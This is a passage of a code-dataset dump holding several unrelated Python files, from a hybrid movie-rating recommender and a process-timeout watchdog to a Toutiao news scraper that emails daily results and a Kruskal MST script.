0)\r\n #ind[item-1] = False\r\n normal_cosine = np.sum(np.absolute(sim_cosine[ind]))\r\n normal_jaccard = np.sum(np.absolute(sim_jaccard[ind]))\r\n normal_pearson = np.sum(np.absolute(sim_pearson[ind]))\r\n if normal_cosine > 0:\r\n item_pred_cosine = np.dot(sim_cosine,M[user-1])/normal_cosine\r\n\r\n if normal_jaccard > 0:\r\n item_pred_jaccard = np.dot(sim_jaccard,M[user-1])/normal_jaccard\r\n\r\n if normal_pearson > 0:\r\n item_pred_pearson = np.dot(sim_pearson,M[user-1])/normal_pearson\r\n\r\n if item_pred_cosine < 0:\r\n item_pred_cosine = 0\r\n\r\n if item_pred_cosine > 5:\r\n item_pred_cosine = 5\r\n\r\n if item_pred_jaccard < 0:\r\n item_pred_jaccard = 0\r\n\r\n if item_pred_jaccard > 5:\r\n item_pred_jaccard = 5\r\n\r\n if item_pred_pearson < 0:\r\n item_pred_pearson = 0\r\n\r\n if item_pred_pearson > 5:\r\n item_pred_pearson = 5\r\n\r\n #user-based\r\n if np.count_nonzero(M[user-1]):\r\n sim_cosine = sim_user_cosine[user-1]\r\n sim_jaccard = sim_user_jaccard[user-1]\r\n sim_pearson = sim_user_pearson[user-1]\r\n ind = (M[:,item-1] > 0)\r\n #ind[user-1] = False\r\n normal_cosine = np.sum(np.absolute(sim_cosine[ind]))\r\n normal_jaccard = np.sum(np.absolute(sim_jaccard[ind]))\r\n normal_pearson = np.sum(np.absolute(sim_pearson[ind]))\r\n if normal_cosine > 0:\r\n user_pred_cosine = np.dot(sim_cosine,M[:,item-1])/normal_cosine\r\n\r\n if normal_jaccard > 0:\r\n user_pred_jaccard = np.dot(sim_jaccard,M[:,item-1])/normal_jaccard\r\n\r\n if normal_pearson > 0:\r\n user_pred_pearson = np.dot(sim_pearson,M[:,item-1])/normal_pearson\r\n\r\n if user_pred_cosine < 0:\r\n user_pred_cosine = 0\r\n\r\n if user_pred_cosine > 5:\r\n user_pred_cosine = 5\r\n\r\n if user_pred_jaccard < 0:\r\n user_pred_jaccard = 0\r\n\r\n if user_pred_jaccard > 5:\r\n user_pred_jaccard = 5\r\n\r\n if user_pred_pearson < 0:\r\n user_pred_pearson = 0\r\n\r\n if user_pred_pearson > 5:\r\n user_pred_pearson = 5\r\n\r\n if (user_pred_cosine != 0 and user_pred_cosine != 5) and (item_pred_cosine 
!= 0 and item_pred_cosine != 5):\r\n pred_cosine = (user_pred_cosine + item_pred_cosine)/2\r\n else:\r\n if (user_pred_cosine == 0 or user_pred_cosine == 5):\r\n if (item_pred_cosine != 0 and item_pred_cosine != 5):\r\n pred_cosine = item_pred_cosine\r\n else:\r\n pred_cosine = 3.0\r\n else:\r\n if (user_pred_cosine != 0 and user_pred_cosine != 5):\r\n pred_cosine = user_pred_cosine\r\n else:\r\n pred_cosine = 3.0\r\n\r\n if (user_pred_jaccard != 0 and user_pred_jaccard != 5) and (item_pred_jaccard != 0 and item_pred_jaccard != 5):\r\n pred_jaccard = (user_pred_jaccard + item_pred_jaccard)/2\r\n else:\r\n if (user_pred_jaccard == 0 or user_pred_jaccard == 5):\r\n if (item_pred_jaccard != 0 and item_pred_jaccard != 5):\r\n pred_jaccard = item_pred_jaccard\r\n else:\r\n pred_jaccard = 3.0\r\n else:\r\n if (user_pred_jaccard != 0 and user_pred_jaccard != 5):\r\n pred_jaccard = user_pred_jaccard\r\n else:\r\n pred_jaccard = 3.0\r\n\r\n if (user_pred_pearson != 0 and user_pred_pearson != 5) and (item_pred_pearson != 0 and item_pred_pearson != 5):\r\n pred_pearson = (user_pred_pearson + item_pred_pearson)/2\r\n else:\r\n if (user_pred_pearson == 0 or user_pred_pearson == 5):\r\n if (item_pred_pearson != 0 and item_pred_pearson != 5):\r\n pred_pearson = item_pred_pearson\r\n else:\r\n pred_pearson = 3.0\r\n else:\r\n if (user_pred_pearson != 0 and user_pred_pearson != 5):\r\n pred_pearson = user_pred_pearson\r\n else:\r\n pred_pearson = 3.0\r\n\r\n #print (\"pedcosine\" + \"\\n\" + str(user) + \"\\t\" + str(item) + \"\\t\" + str(e[2]) + \"\\t\" + str(pred_cosine) + \"\\t\" + str(pred_jaccard) + \"\\t\" + str(pred_pearson))\r\n pred_rate_cosine.append(pred_cosine)\r\n pred_rate_jaccard.append(pred_jaccard)\r\n pred_rate_pearson.append(pred_pearson)\r\n\r\n rmse_cosine.append(sqrt(mean_squared_error(true_rate, pred_rate_cosine)))\r\n rmse_jaccard.append(sqrt(mean_squared_error(true_rate, pred_rate_jaccard)))\r\n rmse_pearson.append(sqrt(mean_squared_error(true_rate, 
pred_rate_pearson)))\r\n\r\n rmse_cosine = sum(rmse_cosine) / float(len(rmse_cosine))\r\n rmse_pearson = sum(rmse_pearson) / float(len(rmse_pearson))\r\n rmse_jaccard = sum(rmse_jaccard) / float(len(rmse_jaccard))\r\n\r\n\r\n f_rmse = open(file4,\"w\")\r\n f_rmse.write(str(rmse_cosine) + \"\\t\" + str(rmse_jaccard) + \"\\t\" + str(rmse_pearson) + \"\\n\")\r\n\r\n rmse = [rmse_cosine, rmse_jaccard, rmse_pearson]\r\n req_sim = rmse.index(min(rmse))\r\n\r\n f_rmse.write(str(req_sim))\r\n f_rmse.close()\r\n\r\n if req_sim == 0:\r\n sim_mat_user = sim_user_cosine\r\n sim_mat_item = sim_item_cosine\r\n\r\n if req_sim == 1:\r\n sim_mat_user = sim_user_jaccard\r\n sim_mat_item = sim_item_jaccard\r\n\r\n if req_sim == 2:\r\n sim_mat_user = sim_user_pearson\r\n sim_mat_item = sim_item_pearson\r\n\r\n return sim_mat_user, sim_mat_item\r\n\r\ndef predictRating1(data, user_data, item_data):\r\n sim_user, sim_item = crossValidation(data, user_data, item_data)\r\n\r\n M = np.zeros((int(users),int(items)))\r\n for e in data:\r\n M[e[0]-1][e[1]-1] = e[2]\r\n\r\n print(M)\r\n\r\ndef predictRating(data, user_data, item_data):\r\n sim_user, sim_item = crossValidation(data, user_data, item_data)\r\n\r\n M = np.zeros((int(users),int(items)))\r\n for e in data:\r\n M[e[0]-1][e[1]-1] = e[2]\r\n\r\n f = open(file5,\"r\")\r\n toBeRated = {\"user\":[], \"item\":[]}\r\n for row in f:\r\n r = row.split(',')\r\n toBeRated[\"item\"].append(int(r[1]))\r\n toBeRated[\"user\"].append(int(r[0]))\r\n\r\n f.close()\r\n\r\n pred_rate = []\r\n\r\n #fw = open('result3.csv','w')\r\n fw_w = open(file6,'w') #poonam changed file path\r\n\r\n l = len(toBeRated[\"user\"])\r\n for e in range(l):\r\n user = toBeRated[\"user\"][e]\r\n item = toBeRated[\"item\"][e]\r\n\r\n user_pred = 3.0\r\n item_pred = 3.0\r\n\r\n #item-based\r\n if np.count_nonzero(M[:,item-1]):\r\n sim = sim_item[item-1]\r\n ind = (M[user-1] > 0)\r\n #ind[item-1] = False\r\n normal = np.sum(np.absolute(sim[ind]))\r\n if normal > 0:\r\n 
item_pred = np.dot(sim,M[user-1])/normal\r\n\r\n if item_pred < 0:\r\n item_pred = 0\r\n\r\n if item_pred > 5:\r\n item_pred = 5\r\n\r\n #user-based\r\n if np.count_nonzero(M[user-1]):\r\n sim = sim_user[user-1]\r\n ind = (M[:,item-1] > 0)\r\n #ind[user-1] = False\r\n normal = np.sum(np.absolute(sim[ind]))\r\n if normal > 0:\r\n user_pred = np.dot(sim,M[:,item-1])/normal\r\n\r\n if user_pred < 0:\r\n user_pred = 0\r\n\r\n if user_pred > 5:\r\n user_pred = 5\r\n\r\n if (user_pred != 0 and user_pred != 5) and (item_pred != 0 and item_pred != 5):\r\n pred = (user_pred + item_pred)/2\r\n else:\r\n if (user_pred == 0 or user_pred == 5):\r\n if (item_pred != 0 and item_pred != 5):\r\n pred = item_pred\r\n else:\r\n pred = 3.0\r\n else:\r\n if (user_pred != 0 and user_pred != 5):\r\n pred = user_pred\r\n else:\r\n pred = 3.0\r\n\r\n #pred = (user_pred + item_pred)/2\r\n pred_rate.append(pred)\r\n #print(\"Main OUTPUT\")\r\n #print (str(user) + \",\" + str(item) + \",\" + str(pred))\r\n print (str(item))\r\n fw_w.write(str(pred) + \"\\n\")\r\n\r\n\r\n #fw.close()\r\n fw_w.close()\r\n\r\n\r\nratings_csv_data = readingFile(file1)\r\n#print(\"ratings_csv_data\")\r\n#print(ratings_csv_data)\r\n\r\nuser_data = userData(file2)\r\n#print(\"user_data\")\r\n#print(user_data)\r\n\r\nitem_data = itemData(file3)\r\n#print(\"item_data\")\r\n#print(item_data)\r\n\r\n#sim_item_cosine, sim_item_jaccard, sim_item_pearson = similarity_item(item_data)\r\n#print(sim_item_cosine, sim_item_jaccard, sim_item_pearson)\r\n\r\n#sim_user_cosine, sim_user_jaccard, sim_user_pearson = similarity_user(user_data)\r\n#print(sim_user_cosine, sim_user_jaccard, sim_user_pearson)\r\n\r\n#crossValidation(ratings_csv_data, user_data, item_data)\r\n\r\n#sim_user, sim_item = crossValidation(ratings_csv_data, user_data, item_data)\r\n#print(sim_user, sim_item)\r\n\r\npredictRating(ratings_csv_data, user_data, 
item_data)\r\n\r\nsys.stdout.flush()\r\n","sub_path":"python/hybrid.py","file_name":"hybrid.py","file_ext":"py","file_size_in_byte":18632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"20773978","text":"import socket\nfrom .ip_func import format_ip, in_line, is_ip\nimport time\nfrom ..config import setting\n\n\ndef get_ip_address(host_or_ip):\n '''\n 使用2分查找法寻找ip的具体地址\n :param host_or_ip: 域名或者是ip字符串\n :return: 返回ip的具体地址\n '''\n if not is_ip(host_or_ip):\n raise TypeError\n ret = socket.getaddrinfo(host_or_ip, 'http')\n rel_ip = ret[0][4][0]\n with open(setting.data_dir, mode='r', encoding='gbk') as f:\n ip_data = f.readlines()\n lines_num = len(ip_data)\n start_line = 0\n end_line = lines_num - 1\n for i in range(lines_num):\n middle = int((start_line + end_line) / 2)\n if in_line(ip_data[middle], rel_ip) == 0:\n return format_ip(ip_data[middle])[2]\n break\n elif in_line(ip_data[middle], rel_ip) == -1:\n end_line = middle - 1\n else:\n start_line = middle + 1\n\n\ndef main():\n '''\n 测试使用的main函数\n :return: 无返回值\n '''\n start_time = time.time()\n print(get_ip_address('www.baidu.com'))\n print(time.time() - start_time)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"build/lib/ip_address/ip_pack/ip_addr.py","file_name":"ip_addr.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109908569","text":"import xlrd\nimport json\n\nclass Converter:\n def __init__(self, xls_file=\"sample.xls\"):\n self.xls_file = xlrd.open_workbook(xls_file)\n self.labels = []\n self.traductor = {}\n self.elected = []\n\n def sheets(self):\n return self.xls_file.sheet_names()\n\n def get_labels(self):\n for cell in self.xls_file.sheets()[0].row(0):\n self.labels.append(cell.value)\n self.traductor = dict(zip(self.labels, list(range(len(self.labels)))))\n # self.traductor\n # Keys should be: 'CIVILITE': 0, 'PRENOM': 1, 'NOM': 2, 
'FONCTION': 3,\n # 'TITRE': 4, 'PROTOCOLE ROLE': 5, 'PROTOCOLE PERSONNE': 6,\n # 'DEPARTEMENT ELECTION': 7, 'REGION ELECTION': 8, 'TEL DIRECT': 9,\n # 'TEL ORGANISME': 10, 'EMAIL DIRECT': 11, 'EMAIL ORGANISME': 12,\n # 'ORGANISME': 13, 'ADRESSE 1': 14, 'ADRESSE 2': 15, 'CP': 16,\n # 'VILLE': 17, 'PAYS': 18, 'WEB': 19, 'TYPE': 20, 'SOUS TYPE': 21\n return self.labels\n\n def build_json(self, limit=0):\n list_of_row = []\n for i in range(1, self.xls_file.sheets()[0].nrows):\n d = dict((str(title), str(cell.value))\n for (title, cell) in zip(\n self.labels,\n self.xls_file.sheets()[0].row(i)\n ))\n list_of_row.append(d)\n print(i, d)\n if i == limit:\n break\n data = {}\n data[\"headers\"] = self.labels\n data[\"elected\"] = list_of_row\n with open('elected.json', 'w') as outfile:\n json.dump(data, outfile)\n\ndef main():\n converter = Converter(\"database_clean2.xls\")\n converter.get_labels()\n converter.build_json()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"_import/xls_to_json.py","file_name":"xls_to_json.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"208234963","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n# Created by on 15:15 2017/9/21\r\n# data structure\r\n# if timeout is set,\r\n# self.pid_dict | key: pid | value: [elapsed_time, last_time_stamp]\r\n#\r\n# if timeout is None,\r\n# self.pid_dict | key: pid | value: loop_times\r\n\r\nimport time\r\nimport psutil\r\nimport traceback\r\n\r\n__author__ = 'Shawn Yan'\r\n\r\n\r\ndef say_it(msg, debug=1):\r\n if debug:\r\n print(msg)\r\n\r\ndef _kill_process(pid, debug):\r\n say_it(\"Kill process: %s <%s>\" % (pid, time.ctime()), 1)\r\n try:\r\n p = psutil.Process(pid)\r\n for foo in p.children(recursive=True):\r\n say_it(\"kill children process of %s\" % p, debug)\r\n foo.terminate()\r\n else:\r\n p.terminate()\r\n except:\r\n say_it(\"Warning. 
Cannot kill pid: %s\" % pid)\r\n say_it(traceback.format_exc(), debug)\r\n\r\n\r\nclass Timeout(object):\r\n def __init__(self, monitors, sleep_time, sleep_steps, timeout, debug):\r\n self.monitors = monitors\r\n self.sleep_time = sleep_time\r\n self.sleep_steps = sleep_steps\r\n self.timeout = timeout\r\n self.debug = debug\r\n\r\n def process(self):\r\n self.pid_dict = dict()\r\n while True:\r\n new_keys = self.get_new_keys()\r\n if self.timeout:\r\n _pid_dict = dict()\r\n for key in new_keys:\r\n cur_time = time.time()\r\n if key in list(self.pid_dict.keys()):\r\n old_elapsed, old_time = self.pid_dict.get(key)\r\n new_elapsed = cur_time - old_time + old_elapsed\r\n _pid_dict[key] = [new_elapsed, cur_time]\r\n else:\r\n _pid_dict[key] = [0, cur_time]\r\n self.pid_dict = _pid_dict # update it!\r\n else:\r\n self.pid_dict = dict(list(zip(new_keys, [self.pid_dict.get(item, 0)+1 for item in new_keys])))\r\n say_it(self.pid_dict, self.debug)\r\n self.kill_timeout()\r\n # go to sleep\r\n say_it(\"Sleeping ...\", self.debug)\r\n time.sleep(self.sleep_time)\r\n\r\n def get_new_keys(self):\r\n \"\"\"\r\n Get current pid list which name is in the monitor list\r\n :return:\r\n \"\"\"\r\n _new_keys = list()\r\n pid_list = psutil.get_pid_list()\r\n for pid in pid_list:\r\n try:\r\n p = psutil.Process(pid)\r\n _name = p.name()\r\n if _name in self.monitors:\r\n _new_keys.append(pid)\r\n except:\r\n pass\r\n # skip the error\r\n # say_it(traceback.format_exc(), self.debug)\r\n return _new_keys\r\n\r\n def kill_timeout(self):\r\n \"\"\"\r\n kill timeout process's children process one by one\r\n :return:\r\n \"\"\"\r\n _pid_keys = list(self.pid_dict.keys())\r\n for _pid in _pid_keys:\r\n _value = self.pid_dict.get(_pid)\r\n will_kill = (_value[0] > self.timeout) if self.timeout else (_value > self.sleep_steps)\r\n if will_kill:\r\n _kill_process(_pid, self.debug)\r\n\r\nif __name__ == \"__main__\":\r\n my_tst = Timeout([\"pnmainc.exe\"], 3, 10, 10, 0)\r\n 
my_tst.process()\r\n","sub_path":"tmp_client/tools/corescripts3/DEV/bin/xlib/xTimeout.py","file_name":"xTimeout.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527799845","text":"n = int(input())\n\ndata = list(map(int, input().split()))\n\nd = [0] * n\nd[0] = data[0]\n\nfor i in range(1, n):\n d[i] = max(d[i - 1] + data[i], data[i])\n\nprint(max(d))","sub_path":"1912.py","file_name":"1912.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"336905812","text":"import cv2\nimport os\nimport sys\nfrom glob import glob\nfrom tqdm import tqdm\n\n\ndef bulk_convert(src, dst, cascade_file = \"lbpcascade_animeface.xml\"):\n if not os.path.isfile(cascade_file):\n raise RuntimeError(\"%s: not found\" % cascade_file)\n\n # Create classifier\n cascade = cv2.CascadeClassifier(cascade_file)\n for character_folder in [x.path for x in os.scandir(src) if x.is_dir()]:\n print(character_folder)\n files = [y for x in os.walk(character_folder) for y in glob(os.path.join(x[0], '*.*'))]\n for image_file in tqdm(files):\n try:\n target_path = \"/\".join(image_file.strip(\"/\").split('/')[1:-1])\n target_path = os.path.join(dst, target_path)\n # target_path = os.path.join(target_path, character_folder.split(\"\\\\\")[-1]) + \"\\/\"\n if not os.path.exists(target_path):\n os.makedirs(target_path)\n image = cv2.imread(image_file)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.equalizeHist(gray)\n faces = cascade.detectMultiScale(gray,\n # detector options\n scaleFactor = 1.1,\n minNeighbors = 2,\n minSize = (30, 30))\n f = 0\n for (x, y, w, h) in faces:\n \n \n crop_img = image[y:y+h, x:x+w]\n filename = os.path.basename(image_file).split('.')[0]\n #print(f,filename)\n f+=1\n cv2.imwrite(\n os.path.join(target_path, filename +'_' + str(f) + \".jpg\"),\n crop_img\n )\n except:\n 
print(image_file)\n \n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write(\"usage: bulk_convert.py \\n\")\n sys.exit(-1)\n\n bulk_convert(sys.argv[1], sys.argv[2])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"anime face croppping/bulk_convert.py","file_name":"bulk_convert.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"651338579","text":"import time\nparent=[-1]*30\ndef graph_input():\n\tgraph=[]\n\tedge=int(input(\"Enter no. of edges :\"))\n\tprint(\"Enter edges with weights:\")\n\tfor i in range(edge):\n\t\tedges=input(\"Enter edge %d : \"%(i+1))\n\t\tx,y,z=[int(a) for a in edges.split()]\n\t\tgraph.append([x,y,z])\n\tgraph.sort(key=lambda x:x[2])\n\treturn graph\t\n\t\t\t\n\ndef find(i):\n\tif parent[i]==-1:\n\t\treturn i\n\telse:\n\t\treturn find(parent[i])\n\ndef union(i,j):\n\ti_s=find(i)\n\tj_s=find(j)\n\tparent[i_s]=j_s\n\n\ndef kruskal(graph):\n\tresult=[]\n\tencounter=0\n\tk=0\n\tweight=0\n\twhile encounter<3:\n\t\tu=graph[k][0]\n\t\tv=graph[k][1]\n\t\tu_s=find(u)\n\t\tv_s=find(v)\n\t\tif u_s != v_s:\n\t\t\tresult.append([u,v,graph[k][2]])\n\t\t\tunion(u,v)\n\t\t\tencounter+=1\n\t\t\tweight+=graph[k][2]\n\t\tk+=1\n\treturn result,weight\ngraph=graph_input()\nstart=time.clock()\nresult,w=kruskal(graph)\nend=time.clock()\nprint (result)\nprint(\"Weight of MST:\",w)\nprint(\"The Program ran for: \",end-start,\"seconds\")\n","sub_path":"kruskal_new.py","file_name":"kruskal_new.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"562677626","text":"#!/usr/bin/env python3\n# encoding: utf-8\n'''\n@author: lewyuejian\n@license: (C) Copyright 2017-2019, Personal exclusive right.\n@contact: lewyuejian@163.com\n@software: tool\n@application:\n@file: run_method.py\n@time: 2019/12/20 12:08\n@desc:\n'''\nimport json\nimport requests\nclass RunMethod:\n 
def post_main(self,url,data,header=None):\n res = None\n if header != None:\n res = requests.post(url=url,data=data,headers=header)\n else:\n res = requests.post(url=url,data=data)\n #print(res.status_code)\n return res.json()\n\n def get_main(self,url,data=None,header=None):\n res=None\n if header != None:\n res = requests.get(url=url, data=data, headers=header,verify=False).json()\n else:\n res = requests.get(url=url, data=data,verify=False).json()\n return res\n\n def run_main(self,method,url,data=None,header=None):\n res = None\n if method == 'post':\n res = self.post_main(url,data,header)\n else:\n res = self.get_main(url,data,header)\n return json.dumps(res,ensure_ascii=False,sort_keys=True,indent=2) # sort_keys排序 indent空格\n","sub_path":"data/run_method.py","file_name":"run_method.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"33336917","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @File : daily_news_spider.py\n# @Contact : youker_shawn@163.com\nimport time\n\nimport requests\nfrom urllib.parse import urlencode\nimport datetime\nimport jinja2\nimport zmail\nimport re\nfrom lxml import etree\nimport pymongo\n\n__author__ = 'youker'\n__date__ = '2018/8/21 0021 14:54'\n\n'''\n今XX条,“西安教育”新闻类爬虫\n'''\n\n\ndef get_data_list(offset):\n \"\"\"\n 获取原始新闻信息列表,json格式\n ajax请求地址 https://www.toutiao.com/search_content/?offset=0&format=json&keyword=%E8%A5%BF%E5%AE%89%E6%95%99%E8%82%B2&autoload=true&count=20&cur_tab=1&from=search_tab\n :return: 提取返回的json格式中的data,便于直接提取,以及判断是否停止请求\n \"\"\"\n params = {\n 'offset': offset, # 经分析,每次ajax请求只变动此处,递增20\n 'format': 'json',\n 'keyword': '西安教育',\n 'autoload': 'true',\n 'count': '20',\n 'cur_tab': '1',\n 'from': 'search_tab',\n }\n url = 'https://www.toutiao.com/search_content/?' 
+ urlencode(params)\n head = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n try:\n response = requests.get(url, headers=head)\n if response.status_code == 200:\n data_dict = response.json() # 分析得知返回json数据,直接调用方法解析为字典对象\n if not data_dict.get('data'): # 超出ajax可获取的更多内容offset之后,就停止\n return None\n return data_dict['data']\n except requests.ConnectionError:\n return None\n\n\ndef parse_data_list(data_list):\n \"\"\"\n 解析json数据,\n 根据发布时间,只对当日的新闻进行提取(第二天早上发送)\n 提取:标题、发布时间、发布方、摘要、源url(需要组装好),保存为字典对象\n :param data_list:新闻json列表,需要进行提取\n :return: 字典对象的list,提供进行下一步跳转\n \"\"\"\n today = str(datetime.datetime.now()).split()[0]\n news_list = []\n for item in data_list:\n # 保证是新闻项,且获取当日新闻,否则跳过\n if item.get('source_url') and item.get('datetime') and item['datetime'].split()[0] == today:\n news = {\n 'title': item['title'],\n 'datetime': item['datetime'],\n 'source': item['source'],\n 'abstract': item['abstract'],\n 'source_url': 'https://www.toutiao.com' + item['source_url'],\n }\n news_list.append(news)\n return news_list\n\n\ndef get_news_detail(news_url):\n \"\"\"\n 请求得到详情页\n :return: 详情页\n \"\"\"\n try:\n head = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n }\n # 未添加该字段,可能被识别为爬虫,导致无法获取HTML\n response = requests.get(news_url, headers=head)\n if response.status_code == 200:\n return response.text\n except requests.ConnectionError:\n return None\n\n\ndef parse_news_detail(detail_html):\n \"\"\"\n 提取藏在JS中的目标新闻的HTML文档(html敏感字符是字符实体形式,需转换)\n :return:经转换并剔除图片标签后得到的纯文本内容\n \"\"\"\n # 根据规律,编写正则表达式\n pattern = re.compile('articleInfo:.*?content: \\'(.*?>)\\',.*?groupId:', re.S)\n result = re.search(pattern, detail_html)\n if result:\n article_js = result.group(1)\n # 转换实体名称为标签,便于剔除img相关标签以及提取内容\n article_js = article_js.replace('<', '<').replace('>', '>')\n article_html = re.sub('
', '', article_js)\n # 使用Xpath解析,提取出文本\n html = etree.HTML(article_html)\n result = html.xpath('//text()') # 文本段落列表\n return '\\n'.join(result)\n else:\n return None\n\n\ndef create_email_htmlcontent(news_list):\n \"\"\"\n 根据新闻列表,迭代每则新闻,生成HTML邮件内容\n :param news_list: 新闻列表\n :return: HTML内容\n \"\"\"\n # 使用jinja2模板渲染\n # 1.配置模板文件搜索路径\n TemplateLoader = jinja2.FileSystemLoader(searchpath='F:/code_lxy/Python3/news_spider/')\n # 2.创建环境变量\n TemplateEnv = jinja2.Environment(loader=TemplateLoader)\n\n # 3.加载模板,渲染数据\n template_name = 'email_content.html'\n template = TemplateEnv.get_template(template_name)\n html = template.render({'news_list': news_list})\n return html\n\n\ndef send_email(news_list):\n \"\"\"\n 发送每日新闻邮件\n 从解析列表页返回的字典列表数据中提取:标题,时间,发布方,新闻详情页链接,写成html发送邮件\n :param news_list: 新闻字典对象的列表\n :return: 发送成功与否\n \"\"\"\n # 使用邮箱作为发送方\n server = zmail.server('发送方的邮箱', '邮箱登录密码')\n\n # SMTP function.\n if server.smtp_able():\n print('SMTP 功能已开启')\n else:\n print('SMTP 未开启')\n return False\n # POP function.\n if server.pop_able():\n print('POP 功能已开启')\n else:\n print('POP 功能未开启')\n return False\n\n html_content = create_email_htmlcontent(news_list)\n mail = {\n 'subject': '***youker每日新闻推送服务***',\n 'content-html': html_content,\n }\n # 对目标邮箱进行发送,返回发送结果,文件较大可能会进入垃圾邮件\n return server.send_mail('接收方的邮箱', mail)\n\n\ndef save_to_mongodb(news):\n \"\"\"\n 将包含详情内容的字典对象,处理后,存入Mongodb数据库\n :return:\n \"\"\"\n client = pymongo.MongoClient(MONGO_URL)\n db = client[MONGO_DB]\n collection = db[MONGO_COLLECTION]\n try:\n if collection.insert_one(news):\n print('存储到Mongodb成功!')\n except Exception:\n print('存储到Mongodb失败!')\n\n\ndef start_spider():\n offset = 0\n news_list = []\n # 初次获取列表页\n data_list = get_data_list(offset)\n while data_list:\n print('请求到第%d组数据~' % int(offset / 20))\n # 对原生的新闻列表进行提取,返回所需的新闻字典对象的列表(未请求详情内容)\n # 并添加进新闻列表\n news_list.extend(parse_data_list(data_list))\n\n # 请求下一组原生新闻列表页\n time.sleep(3)\n offset += 20\n # 返回为None时,说明json中data为空,即刷新到尾部,可以停止\n data_list = 
get_data_list(offset)\n\n # for news in news_list:\n # print(news)\n\n # 对所有的当天新闻,进行发送邮件,以及保存数据库操作\n if send_email(news_list):\n print('邮件已发出')\n\n for news in news_list:\n # 获取详情页html\n detail_html = get_news_detail(news['source_url'])\n # 提取js中的文章数据,转换为HTML,剔除img标签,提取文本\n article = parse_news_detail(detail_html)\n # 文章文本内容保存进字典\n news['article'] = article\n # 对单则新闻进行保存操作\n save_to_mongodb(news)\n\n\nif __name__ == '__main__':\n MONGO_URL = 'localhost'\n MONGO_DB = 'news_spider_db'\n MONGO_COLLECTION = 'news'\n\n start_spider()\n\n","sub_path":"daily_news_spider.py","file_name":"daily_news_spider.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428761422","text":"import sys\nimport json\nimport os\nimport re\nimport csv\nimport logging\nlogger = logging.getLogger()\n\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom bs4 import BeautifulSoup\nfrom retry import retry\n\ndef setSNSLinksToData(url, data):\n if url.find(\"facebook.com/\") > 0 or url.find(\"instagram.com/\") > 0 or url.find(\"twitter.com/\") > 0:\n return\n \n soup = getBeautifulSoup(url)\n aList = soup.find_all(\"a\")\n for aItem in aList:\n try:\n link = aItem[\"href\"]\n setLinkToData(link, data)\n except:\n continue\n \n@retry(tries=3, delay=3)\ndef getBeautifulSoup(url):\n response = requests.get(url, verify=False)\n response.encoding = response.apparent_encoding\n soup = BeautifulSoup(response.text, \"html.parser\")\n logger.info(\"soup link : {0}\".format(url))\n logger.info(\"soup title : {0}\".format(soup.title))\n return soup\n\ndef setLinkToData(url, data):\n if url.find(\"facebook.com/\") > 0 and url.find(\".php?\") < 0 and url.find(\"facebook.com/WixJapan\") < 0:\n if isPage(url, \"facebook.com\"):\n data[\"facebook\"] = trimParam(url)\n elif url.find(\"instagram.com/\") > 0:\n 
if isPage(url, \"instagram.com\"):\n data[\"instagram\"] = trimParam(url)\n elif url.find(\"twitter.com/\") > 0 and url.find(\"twitter.com/share\") < 0 and url.find(\"twitter.com/intent/\") < 0 and url.find(\"twitter.com/WixJp\") < 0:\n if isPage(url, \"twitter.com\"):\n data[\"twitter\"] = trimParam(url)\n\ndef trimParam(url):\n if url.find(\"?\") > 0:\n url = url[:url.find(\"?\")]\n return url\n\ndef isPage(url, domain):\n tmp = url.replace(\"https://\", \"\").replace(\"www\", \"\").replace(domain, \"\").replace(\".\", \"\").replace(\"/\", \"\")\n return len(tmp) > 1\n","sub_path":"source_h3/importer_util.py","file_name":"importer_util.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"539728958","text":"import os,unittest\nfrom igf_data.utils.fileutils import get_temp_dir,remove_dir\nfrom igf_data.utils.singularity_run_wrapper import singularity_run\nfrom igf_data.utils.singularity_run_wrapper import execute_singuarity_cmd\n\n\nclass Singularity_run_test1(unittest.TestCase):\n def setUp(self):\n self.temp_dir = get_temp_dir()\n self.image_path = os.path.join(self.temp_dir,'image.sif')\n with open(self.image_path,'w') as fp:\n fp.write('a')\n\n def tearDown(self):\n remove_dir(self.temp_dir)\n\n def test_singularity_run(self):\n singularity_cmd = \\\n singularity_run(\n image_path=self.image_path,\n bind_dir_list=[self.temp_dir],\n args_list=['ls','-l','/home/vmuser'],\n dry_run=True)\n self.assertTrue('{0} --bind {1} ls -l /home/vmuser'.\\\n format(os.path.basename(self.image_path),[self.temp_dir]) \\\n in singularity_cmd)\n\n def test_execute_singuarity_cmd(self):\n singularity_cmd = \\\n execute_singuarity_cmd(\n 